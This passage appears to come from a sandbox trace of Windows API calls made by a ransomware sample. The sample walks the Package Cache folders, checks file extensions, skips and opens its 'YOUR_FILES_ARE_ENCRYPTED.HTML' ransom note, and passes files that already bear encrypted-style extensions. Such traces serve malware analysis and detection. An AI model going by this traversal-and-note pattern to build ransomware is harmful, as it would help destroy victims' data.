pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.174] GetProcessHeap () returned 0x270000 [0170.175] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.175] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0170.175] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 75 [0170.175] GetProcessHeap () returned 0x270000 [0170.175] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.175] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0170.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0170.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.175] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.175] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359dcc70, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3d0955b0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0170.175] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 85 [0170.175] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.175] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.176] lstrlenW (lpString=".rsm") returned 4 [0170.176] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 93 [0170.176] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.176] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0170.176] lstrlenW (lpString=".exe") returned 4 [0170.176] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8a38a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.176] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8a38a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.176] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.176] GetProcessHeap () returned 0x270000 [0170.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.178] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0170.178] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 86 [0170.178] GetProcessHeap () returned 0x270000 [0170.178] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.178] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0170.178] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" [0170.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.178] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.178] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.178] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 95 [0170.179] GetProcessHeap () returned 0x270000 [0170.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.179] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0170.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0170.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.179] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.179] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.179] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 119 [0170.179] GetProcessHeap () returned 0x270000 [0170.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.179] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0170.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0170.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.179] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xccca7dc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958", cAlternateFileName="CAB1CA~1.AD7")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned 193 [0170.180] lstrcmpW (lpString1="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.180] PathFindExtensionW (pszPath="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" [0170.180] lstrlenW (lpString=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned 65 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0170.180] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.180] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.180] lstrlenW (lpString=".msi") returned 4 [0170.180] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8c9a00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8c9a00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.180] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8c9a00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8c9a00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.180] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.180] GetProcessHeap () returned 0x270000 [0170.181] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.181] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.182] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.182] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.182] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.182] GetProcessHeap () returned 0x270000 [0170.183] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.183] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", 